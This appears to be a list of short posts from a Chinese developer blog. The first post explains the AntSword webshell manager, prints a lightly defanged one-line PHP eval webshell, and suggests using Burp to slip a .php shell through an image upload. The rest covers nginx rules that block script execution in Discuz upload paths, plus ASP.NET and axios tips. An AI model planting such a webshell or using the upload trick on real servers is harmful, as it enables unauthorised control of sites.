博客 (103)

中国蚁剑

https://github.com/AntSwordProject

https://github.com/AntSwordProject/AntSword-Loader

http://t.zoukankan.com/liang-chen-p-14181806.html

使用说明：

下载 AntSword-Loader 和 antSword 并解压；

打开 AntSword.exe，初始化时选择 antSword 目录；

右键“添加数据”，填 URL，选择连接类型，以 PHP 为例，服务器上放置一个 PHP 文件，格式如：

<?php @ev删除这七个汉字al($_POST['value']); ?>

那么，“连接密码”就填 POST 的参数名 value。

添加完成，双击可打开树状菜单，显示服务器上所有有权限的文件。

Burp：篡改请求（譬如上传图片时将文件名改为.php，并添加shell脚本）

https://portswigger.net/burp

使用方法：https://zhuanlan.zhihu.com/p/537053564

一句话木马：https://www.icode9.com/content-4-1081174.html

ASP.NET 6 项目在 IIS 中打开显示 503 错误，但直接运行 .exe 文件运行正常。可尝试回收应用程序池。

System.ComponentModel.Win32Exception: 拒绝访问。

[ExternalException (0x80004005): 无法执行程序。所执行的命令为 "\bin\roslyn\csc.exe" /shared /keepalive:"10" /noconfig  /fullpaths @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\8c8f68eb\880f02b5\alczcu1a.cmdline"。]

解决方法：

web 部署发布时勾选“在发布期间预编译”

在“配置”中，去掉“允许更新预编辑站点”前的勾，勾选“不合并。为每个页面和控件创建单独的程序集”

首先，禁止网站下所有 .php 等文件均不允许被访问到。

在 nginx 网站配置文件中，include enable-php-**.conf; 上方插入：

location ~ ^/.*\.(php|php5|py|sh|bash|out)$ { deny all; }

其中，^ 匹配开始，/.* 匹配所有目录和文件名，\.(php|php5|py|sh|bash|out) 匹配文件后缀名，$ 匹配结束。

即便如此，仍然忽略了 nginx 中 .php 文件名后加斜杠仍然能访问到的情况，譬如我们访问这个网址：

https://xoyozo.net/phpinfo.php/abc.html

nginx 仍然运行了 phpinfo.php，给了后门可趁之机，所以改进为：

location ~ ^/.*\.(php|php5|py|sh|bash|out)(/.*)?$ { deny all; }

Discuz! X3.4 需要写入权限的目录：

• /自研目录/upload/

• /config/

• /data/

• /uc_client/data/

• /uc_server/data/

• /source/plugin/

但，这些都不重要，我们已经禁止了所有目录的 .php 访问了。

第二步，解禁需要直接被访问到的文件路径。

Discuz! X3.4 根目录下的 .php 文件都是入口文件，需要能够被访问到：

/admin.php
/api.php
/connect.php
/forum.php
/group.php
/home.php
/index.php
/member.php
/misc.php
/plugin.php
/portal.php
/search.php

其它目录中需要被直接访问到的文件：

/archiver/index.php
/m/index.php
/uc_server/admin.php
/uc_server/avatar.php
/uc_server/index.php

部分插件文件需要能够被直接访问到：

/source/plugin/magmobileapi/magmobileapi.php
/source/plugin/smstong/accountinfo.php
/source/plugin/smstong/checkenv.php

另外如果有自建目录需要有 .php 访问权限，那么也需要在此处加白，本文以 /_/ 目录为例

最终拼成：工具

location ~ ^(?:(?!(/admin\.php|/api\.php|/connect\.php|/forum\.php|/group\.php|/home\.php|/index\.php|/member\.php|/misc\.php|/plugin\.php|/portal\.php|/search\.php|/archiver/index\.php|/m/index\.php|/uc_server/admin\.php|/uc_server/avatar\.php|/uc_server/index\.php|/source/plugin/magmobileapi/magmobileapi\.php|/source/plugin/smstong/accountinfo\.php|/source/plugin/smstong/checkenv\.php|/_/.*\.php))/.*\.(php|php5|py|sh|bash|out)(/.*)?)$ { deny all; }

这里用到正则表达式中的“不捕获”和“负向零宽断言”语法，格式为：

^(?:(?!(允许的目录或文件A|允许的目录或文件B))禁止的目录和文件)$

值得注意的是，此句负向零宽断言中的匹配内容是匹配前缀的，也就是说

https://xoyozo.net/index.php
https://xoyozo.net/index.php/abc.html

都可以访问到，而

https://xoyozo.net/forbidden.php
https://xoyozo.net/forbidden.php/abc.html

都访问不到，这是符合需求的。

如果自建目录 /_/ 下有写入需求，单独禁止即可，以 /_/upload/ 为例：

location ~ ^/_/upload/.*\.(php|php5|py|sh|bash|out)(/.*)?$ { deny all; }

ThinkPHP 网站有统一的访问入口，可按本文方法配置访问权限。

特别注意：上面的代码必须加在 PHP 引用配置（include enable-php-**.conf;）的上方才有效。

附：一键生成 nginx 访问控制 location URI { } 语句工具

您需要将 IWebHostEnvironment 注入到类中才能访问属性值 ApplicationBasePath：阅读有关依赖关系注入的信息。成功注入依赖项后，wwwroot 路径应该可供您使用。例如：

private readonly IWebHostEnvironment _appEnvironment;

public ProductsController(IWebHostEnvironment appEnvironment)
{
   _appEnvironment = appEnvironment;
}

用法：

 [HttpGet]
 public IEnumerable<string> Get()
 {
    FolderScanner scanner = new FolderScanner(_appEnvironment.WebRootPath);
    return scanner.scan();
 }

编辑：在 ASP.NET 的更高版本中，IHostingEnvironment 已被替换为 IWebHostEnvironment。

POST

axios.post('AjaxCases', {
    following: true,
    success: null,
    page: 1,
}).then(function (response) {
    console.log(response.data)
}).catch(function (error) {
    console.log(error.response.data);
});

[HttpPost]
public IActionResult AjaxCases([FromBody] AjaxCasesRequestModel req)
{
    bool? following = req.following;
    bool? success = req.success;
    int page = req.page;
}

GET

axios.get('AjaxCase', {
    params: {
        int: 123,
    }
}).then(function (response) {
    console.log(response.data)
}).catch(function (error) {
    console.log(error.response.data);
});

[HttpGet]
public IActionResult AjaxCases([FromQuery] int id)
{
}

DELETE

格式与 GET 类似

* 若服务端获取参数值为 null，可能的情况如下：

• 请检查相关枚举类型是否已设置 [JsonConverter] 属性，参：C# 枚举（enum）用法笔记，且传入的值不能为空字符串，可以传入 null 值，并将服务端 enum 类型改为可空。可以以 string 方式接收参数后再进行转换。

• 模型中属性名称不能重复（大小写不同也不行）。

• 布尔型属性值必须传递布尔型值，即在 JS 中，字符串 "true" 应 JSON.parse("true") 为 true 后再回传给服务端，vue 绑定方式参此文。

参考：jQuery 请求 .NET Core / .NET 5 / .NET 6

直接运行项目启动程序（在发布目录中，以项目名称为文件名，扩展名为 .exe 的可执行程序）

启动后可在“Now listening on:”所在行看到访问入口 URL（如图中 http://localhost:5000）。

在同服浏览器中打开该地址，访问到报错页面，回到该命令行窗口可见“fail”异常的详细信息。

1. 下载安装 ossftp：https://help.aliyun.com/document_detail/197500.html

2. 设置 ossftp 开机启动：https://xoyozo.net/Blog/Details/linux-init-d

3. 配置 Discuz! 存储远程附件到 OSS：https://help.aliyun.com/document_detail/32191.html
   

如果你的视图页面（.cshtml）是由另一个视图页面复制而来的，就有可能出现开发调试时正常，发布到服务器后打开报 500 错误。

解决方法是：新建一个 .cshtml 页面，将代码移植到这个文件上，删除原来的页面，更改刚创建的文件名。

你也可以直接修改项目文件将视图页面重新包含到项目中。

ASP.NET 5 发布后出现 cs / de / es / fr / it / ja / ko / pl / pt-BR / ru / tr / zh-Hans / zh-Hant 语言目录

想要清除它们，只需要在项目上右键选择编辑项目文件

在 <PropertyGroup /> 节点添加以下节点即可：

<SatelliteResourceLanguages>zh-Hans</SatelliteResourceLanguages>